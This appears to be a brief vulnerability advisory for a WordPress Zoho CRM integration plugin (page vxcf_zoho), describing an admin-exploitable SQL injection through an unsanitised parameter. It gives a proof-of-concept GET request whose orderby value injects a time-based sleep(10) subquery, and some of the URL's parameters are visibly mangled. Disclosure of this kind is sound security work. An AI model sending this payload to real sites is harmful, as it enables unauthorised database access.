The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin
1. Send a GET request with /wp-admin/admin.php?page=vxcf_zoho&id;=&tab;=logs&search;=ℴ=desc&orderby;=crm_id%2c(select*from(select(sleep(10)))a)&vx;_tab_action_vxcf_zoho=&object;=&status;=&time;=&start;_date=&end;_date=
2. Observe SQLi